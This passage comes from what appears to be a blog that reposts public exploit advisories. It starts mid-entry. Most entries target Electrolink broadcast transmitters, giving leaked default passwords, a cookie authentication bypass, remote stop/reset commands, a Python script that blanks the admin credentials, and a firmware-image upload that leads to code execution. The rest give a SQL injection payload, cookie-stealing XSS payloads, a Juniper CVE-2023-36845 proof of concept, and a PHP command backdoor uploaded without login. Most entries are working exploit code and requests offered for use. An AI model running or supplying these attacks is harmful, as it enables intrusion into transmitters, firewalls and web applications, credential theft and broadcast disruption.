    Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device is vulnerable to a disclosure of clear-text credentials in login.htm and mail.htm that can allow security bypass and system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-XXXX Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw" 55:<td class=cd31>Admin password</td> 56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td> 63:<td class=cd31>Guest password</td> 64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td> C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw" 93:<td class=cd31>Server password</td> 94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>
  16. HireHackking

    Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The transmitter is vulnerable to an authentication bypass vulnerability affecting the Login Cookie. An attacker can set an arbitrary value except 'NO' to the Login Cookie and have full system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5791 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"
  17. HireHackking

    Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure

    HireHackking posted a blog entry in Hacker Technology
    Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device is vulnerable to a disclosure of clear-text credentials in controlloLogin.js that can allow security bypass and system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5790 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js" function verifica() { var user = document.getElementById('user').value; var password = document.getElementById('password').value; //alert(user); if(user=='admin' && password=='cozzir'){ SetCookie('Login','OK',exp); window.location.replace("FrameSetCore.html"); }else{ SetCookie('Login','NO',exp); window.location.replace("login.html"); } }
  18. HireHackking

    Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS

    HireHackking posted a blog entry in Hacker Technology
    Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The transmitter is suffering from a Denial of Service (DoS) scenario. An unauthenticated attacker can reset the board as well as stop the transmitter operations by sending one GET request to the command.cgi gateway. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5795 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php 30.06.2023 -- C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board) Success! OK C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop) Success! OK C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start) Success! OK
  19. HireHackking

    Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python # # # Electrolink FM/DAB/TV Transmitter Remote Authentication Removal # # # Vendor: Electrolink s.r.l. # Product web page: https://www.electrolink.com # Affected version: 10W, 100W, 250W, Compact DAB Transmitter # 500W, 1kW, 2kW Medium DAB Transmitter # 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter # 100W, 500W, 1kW, 2kW Compact FM Transmitter # 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter # 15W - 40kW Digital FM Transmitter # BI, BIII VHF TV Transmitter # 10W - 5kW UHF TV Transmitter # Web version: 01.09, 01.08, 01.07 # Display version: 1.4, 1.2 # Control unit version: 01.06, 01.04, 01.03 # Firmware version: 2.1 # # Summary: Since 1990 Electrolink has been dealing with design and # manufacturing of advanced technologies for radio and television # broadcasting. The most comprehensive products range includes: FM # Transmitters, DAB Transmitters, TV Transmitters for analogue and # digital multistandard operation, Bandpass Filters (FM, DAB, ATV, # DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial # switches, Manual patch panels, RF power meters, Rigid line and # accessories. A professional solution that meets broadcasters needs # from small community television or radio to big government networks. # # Compact DAB Transmitters 10W, 100W and 250W models with 3.5" # touch-screen display and in-built state of the art DAB modulator, # EDI input and GPS receiver. All transmitters are equipped with a # state-of-the art DAB modulator with excellent performances, # self-protected and self-controlled amplifiers ensure trouble-free # non-stop operation. # # 100W, 500W, 1kW and 2kW power range available on compact 2U and # 3U 19" frame. Built-in stereo coder, touch screen display and # efficient low noise air cooling system. Available models: 3kW, # 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters # with fully broadband solid state amplifiers and an efficient # low-noise air cooling system. # # FM digital modulator with excellent specifications, built-in # stereo and RDS coder. Digital deviation limiter together with # ASI and SDI inputs are available. These transmitters are ready # for ISOFREQUENCY networks. # # Available for VHF BI and VHF BIII operation with robust desing # and user-friendly local and remote control. Multi-standard UHF # TV transmitters from 10W up to 5kW with efficient low noise air # cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC # and ISDB-Tb available. # # Desc: The application is vulnerable to an unauthenticated # parameter manipulation that allows an attacker to set the # credentials to blank giving her access to the admin panel. # Also vulnerable to account takeover and arbitrary password # change. # # Tested on: Mbedthis-Appweb/12.5.0 # Mbedthis-Appweb/12.0.0 # # # Vulnerability discovered by Neurogenesia # Macedonian Information Security Research & Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2023-5792 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php # # # 30.06.2023 # # import datetime import requests dt = datetime.datetime.now() dt = dt.strftime('%d.%m.%Y %H:%M:%S') nul = '' print('Starting transmitter exploit at', dt) ip = input('Enter transmitter ip: ') if 'http' not in ip: ip = 'http://' + ip ep = '/login.htm' url = ip + ep signature = {'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'ku-MK,en;q=0.1806', 'User-Agent' : 'Broadcastso/B.B', 'Connection' : 'keep-alive' } # ----------------- Line breaker v0.17 ----------------- postd = { 'adminuser' : nul, 'guestuser' : nul, 'adminpassword' : nul, 'guestpassword' : nul } print('Removing security control...') r = requests.post(url, data = postd, headers = signature) if r.status_code == 200: print('Done. Go and "Login".') else: print('Error') exit(-4)
  20. HireHackking

    Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device allows access to an unprotected endpoint that allows MPFS File System binary image upload without authentication. The MPFS2 file system module provides a light-weight read-only file system that can be stored in external EEPROM, external serial Flash, or internal Flash program memory. This file system serves as the basis for the HTTP2 web server module, but is also used by the SNMP module and is available to other applications that require basic read-only storage capabilities. This can be exploited to overwrite the flash program memory that holds the web server's main interfaces and execute arbitrary code. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5796 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html 30.06.2023 -- POST /upload HTTP/1.1 Host: 192.168.150.77:8888 Content-Length: 251 Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----joxypoxy User-Agent: MPFS2_PoC/1.0c Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Login=IgnoreMePlsKtnx Connection: close ------joxypoxy Content-Disposition: form-data; name="i"; filename="MPFSimg.bin" Content-Type: application/octet-stream MPFS...<CGI BINARY PHONE HOME> -----joxypoxy-- HTTP/1.1 200 OK Connection: close Content-Type: text/html <html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html> --- hd htm: 0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C.... 2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d.... 00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm.<ht 6d 6c 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 53 4c 3c ml>..<title>ZSL< ... ... 64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..- --- MPFS Structure: [M][P][F][S] [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files] [Name Hash 0][Name Hash 1]...[Name Hash N] [File Record 0][File Record 1]...[File Record N] [String 0][String 1]...[String N] [File Data 0][File Data 1]...[File Data N] --- C:\>javaw -jar MPFS2.jar C:\>mpfs2 -v -l MPFSimg.bin Version: 2.1 Number of files: 1 (1 regular, 0 index) Number of dynamic variables: 0 FileRecord 0: .StringPtr = 32 index0.htm .DataPtr = 43 .Len = 48 .Timestamp = 2023-08-27T14:39:30Z .Flags = 0
  21. HireHackking

    Curfew e-Pass Management System 1.0 - FromDate SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL Injection # Date: 28/9/2023 # Exploit Author: Puja Dey # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Wamp 1) login into the application 2) click on report on pass and capture the request in burpsuite 3) Parameter "FromDate" is vulnerable to SQL Injection Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND 'SOzQ'='SOzQ&todate=&submit= 4) Put '*' in the value for the parameter and save the item as cpme 5) Run sqlmap -r cpme --batch --dbs --random-agent
  22. HireHackking

    GYM MS - GYM Management System - Cross Site Scripting (Stored)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored) # Date: 29/09/2023 # Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip # Version: 1.0 # Last Update: 31 August 2022 # Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30 # 1: Create user, login and go to profile.php # 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field. # 3: When entering the profile.php page, document.cookie will be reflected every time. # Author This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner. # About Rapplex Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites. Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments. So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson. # HTTP Request POST /gym/profile.php HTTP/1.1 Host: localhost Content-Length: 129 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE Connection: close fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update
  23. HireHackking

    Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # *************************************************************************************************** # Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC) # Description: # # This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845. # It executes the phpinfo() function on the login page of the target device, # allowing to inspect the PHP configuration. also this script has the option to save the phpinfo() # output to a file for further analysis. # # Shodan Dork: http.favicon.hash:2141724739 # Date: 2023/10/01 # Exploit Author: whiteOwl (whiteowl.pub@gmail.com) # Vendor Homepage: https://whiteowl-pub.github.io # Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5, # 21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22. # 4R2-S1/R3,23.2R1-S1/R2 # Tested on: JUNOS SM804122pri 15.1X49-D170.4 # CVE : cve-2023-36845 # *************************************************************************************************** import argparse import requests banner = """ ************************************************************* * CVE-2023-36845 Vulnerability Detector & Proof of concept * * This script checks for the CVE-2023-36845 vulnerability * * and run phpinfo() on vulnerable devices. * * If you suspect a vulnerable system, please take action * * immediately to secure it. * * * * Author: whiteowl * ************************************************************* """ def send_request(url, output_file=None, verbose=False): target_url = f"{url}/?PHPRC=/dev/fd/0" data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="' headers = { 'User-Agent': 'Mozilla/5.0', } try: response = requests.post(target_url, headers=headers, data=data, stream=True) if response.status_code == 200: print("The Target Device is Vulnerable to: CVE-2023-36845") else: print("Not Vulnerable: Status Code", response.status_code) if output_file: with open(output_file, 'w', encoding='utf-8') as file: file.write(response.text) if verbose: print(f"HTTP Status Code: {response.status_code}") print("Response Headers:") for header, value in response.headers.items(): print(f"{header}: {value}") print("Response Content:") print(response.text) except requests.exceptions.RequestException as e: print(f"An error occurred: {e}") def main(): print(banner) parser = argparse.ArgumentParser(description="Custom curl-like script") parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request") parser.add_argument("-o", "--output", help="Output file to save the HTML content") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode") args = parser.parse_args() send_request(args.url, args.output, args.verbose) if __name__ == "__main__": main()
  24. HireHackking

    MISP 2.4.171 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated) # Date: 8th October 2023 # Exploit Author: Mücahit Çeri # Vendor Homepage: https://www.circl.lu/ # Software Link: https://github.com/MISP/MISP # Version: 2.4.171 # Tested on: Ubuntu 20.04 # CVE : CVE-2023-37307 # Exploit: Logged in as low privileged account 1)Click on the "Galaxies" button in the top menu 2)Click "Add Cluster" in the left menu. 3)Enter the payload "</title><script>alert(1)</script>" in the Name parameter. 4)Other fields are filled randomly. Click on Submit button. 5)When the relevant cluster is displayed, we see that alert(1) is running
  25. HireHackking

    Clinic's Patient Management System 1.0 - Unauthenticated RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE # Date: 07.10.2023 # Exploit Author: Oğulcan Hami Gül # Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code # Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code # Version: 1.0 # Tested on: Windows 10 ## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication. POST /pms/users.php HTTP/1.1 Host: 192.168.1.36 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367 Content-Length: 1054 Origin: http://192.168.1.36 Connection: close Referer: http://192.168.1.36/pms/users.php Upgrade-Insecure-Requests: 1 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="display_name" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="user_name" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="password" sefa7 -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php" Content-Type: application/x-php <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd <!-- http://michaeldaw.org 2006 --> -----------------------------421755697017784551042596452367 Content-Disposition: form-data; name="save_user" -----------------------------421755697017784551042596452367-- ## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication. ## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.